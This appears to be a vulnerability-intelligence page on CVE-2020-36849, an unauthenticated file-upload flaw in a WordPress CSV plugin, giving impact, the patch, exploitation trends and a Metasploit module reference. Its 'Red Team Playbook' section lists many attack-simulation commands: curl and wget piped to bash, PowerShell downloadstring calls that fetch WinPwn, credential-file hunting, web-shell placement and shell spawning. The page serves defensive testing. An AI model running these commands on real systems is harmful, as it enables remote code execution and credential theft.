CVE-2020-36849
Overview
This vulnerability is an arbitrary file upload flaw resulting from insufficient file type validation in the AIT CSV import/export WordPress plugin. The root cause lies in the upload-handler.php script within the admin directory, which fails to properly verify uploaded file extensions or content types. This improper validation occurs in versions up to and including 3.0.3, allowing malicious files to be accepted by the plugin's upload mechanism.
Vulnerability Description
The AIT CSV import/export plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the /wp-content/plugins/ait-csv-import-export/admin/upload-handler.php file in versions up to, and including, 3.0.3. This makes it possible for unauthorized attackers to upload arbitrary files on the affected sites server which may make remote code execution possible.
Impact
An unauthenticated remote attacker can exploit this vulnerability to upload arbitrary files to the affected server, potentially leading to remote code execution. No user interaction or authentication is required (AV:N/AC:L/PR:N/UI:N), allowing direct exploitation over the network. Successful exploitation can result in full system compromise, data breaches, or service disruption, as attackers may execute arbitrary commands or deploy backdoors via the uploaded files.
Solution
Users should upgrade the AIT CSV import/export plugin to version 3.0.4 or later, where the vendor has implemented proper file type validation in the upload-handler.php script. Detailed patch instructions and advisory information are available on the vendor's official site: https://www.ait-themes.club/wordpress-plugins/csv-import-export/. Additionally, security researchers recommend verifying plugin updates through trusted sources such as Wordfence and Acunetix advisories linked in the references.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the AIT CSV import/export plugin for WordPress is primarily attributed to inadequate validation of file types during the upload process. Specifically, the flaw resides in the upload-handler.php file, where the plugin fails to properly restrict the types of files that can be uploaded. This oversight allows an attacker to bypass intended security measures and upload arbitrary files, including potentially malicious scripts. The lack of stringent checks on file extensions and content means that an attacker can exploit this vulnerability to upload executable code, which could lead to remote code execution on the server hosting the affected WordPress site.
Attack vectors for this vulnerability are straightforward yet highly effective. An attacker could craft a malicious file, such as a PHP script, and disguise it with a benign file extension like .csv or .txt. By leveraging the upload functionality of the plugin, the attacker can upload this file to the server without triggering any security alerts. Once the malicious file is on the server, the attacker can execute it by navigating to its URL, thereby gaining unauthorized access to the server environment. This exploitation could lead to a range of malicious activities, including data theft, website defacement, or the installation of backdoors for persistent access.
The real-world impact of this vulnerability can be severe, particularly for organizations that rely on WordPress for their online presence. Successful exploitation may result in unauthorized access to sensitive data, including customer information and proprietary business data. Furthermore, the potential for remote code execution poses significant risks, as attackers could manipulate the server to launch further attacks, compromise other connected systems, or use the server as a launching pad for distributed denial-of-service (DDoS) attacks. The business risks associated with such incidents include reputational damage, loss of customer trust, regulatory penalties, and financial losses stemming from remediation efforts and potential legal liabilities.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating all plugins and themes to their latest versions is crucial, as developers often release patches to address known vulnerabilities. Additionally, employing a web application firewall (WAF) can help filter out malicious traffic and block attempts to exploit this vulnerability. Organizations should also conduct regular security audits and vulnerability assessments to identify and remediate weaknesses in their web applications. Furthermore, implementing strict file upload policies, including whitelisting allowed file types and conducting thorough file content validation, can significantly reduce the risk of arbitrary file uploads.
In conclusion, the vulnerability within the AIT CSV import/export plugin for WordPress highlights the critical importance of robust file upload validation mechanisms in web applications. The potential for arbitrary file uploads leading to remote code execution presents a significant threat to the security of affected sites. Organizations must prioritize proactive security measures, including timely updates, comprehensive security assessments, and stringent file handling policies, to safeguard against such vulnerabilities and protect their digital assets from malicious actors.
CSURFACE threat intelligence has identified a marked increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2020-36849, rising by over 14% to a current level near the 99th percentile. This upward trend, although not rapid, indicates growing confidence in the likelihood of exploitation based on evolving attacker behavior and environmental factors. Our telemetry corroborates a persistent presence of publicly available exploit modules, such as those in Metasploit, which facilitate unauthorized remote code execution through arbitrary file uploads in affected WordPress environments. The elevated EPSS score reflects heightened exploitation potential, underscoring an increased risk posture for organizations running vulnerable versions of the AIT CSV import/export plugin. Defenders should interpret this change as a signal that exploitation attempts are becoming more probable and possibly more frequent, raising the urgency for detection and response capabilities tailored to this vulnerability. While no new exploit variants have been observed, the combination of accessible exploit tools and rising exploitation likelihood elevates the threat level from critical theoretical risk to an actively exploitable condition in the wild.
Update 2 — June 08, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting the CVE-2020-36849 vulnerability in the AIT CSV import/export WordPress plugin. Our telemetry indicates that adversaries are increasingly leveraging publicly available exploit modules to deploy arbitrary file uploads, with evidence of active scanning and probing campaigns against vulnerable endpoints. This shift from theoretical risk to observable exploitation activity underscores a heightened threat environment, particularly as the exploit requires no authentication and can result in remote code execution. The stable EPSS score at a high percentile confirms sustained exploitability, while the absence of new exploit variants suggests attackers are refining existing methods rather than innovating new ones. For defenders, this development signals an urgent need to prioritize detection capabilities focused on anomalous file uploads and webshell indicators within WordPress environments running affected plugin versions. The elevated exploitation pressure also raises the likelihood of opportunistic threat actors, including financially motivated groups, incorporating this vulnerability into broader attack chains.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Ait-Themes | Csv Import \/ Export | All |
cpe:2.3:a:ait-themes:csv_import_\/_export:*:*:*:*:*:wordpress:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
WordPress AIT CSV Import Export Unauthenticated Remote Code Execution
exploits/multi/http/wp_ait_csv_rce
|
h00die | Unknown | php | View |
Threat Feed
2 eventsSighting activity recorded
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-1 | Accessing Functionality Not Properly Constrained by ACLs |
35%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (7)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2020-36849 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/cece751c-400d-42b4-9438-950d5aca51fc?source=cve |
| ait-themes.club |
GitHub CVE
|
https://www.ait-themes.club/wordpress-plugins/csv-import-export/ |
| acunetix.com |
GitHub CVE
|
https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-ait-themes-csv-import-export-arbitrary-file-upload-3-0-3/ |
| wpscan.com |
GitHub CVE
|
https://wpscan.com/vulnerability/36e699a4-91f2-426d-ba14-26036fbfeaea |
| github.com |
GitHub CVE
|
https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/wp_ait_csv_rce.rb |
| raw.githubusercontent.com |
GitHub CVE
|
https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/wp_ait_csv_rce.rb |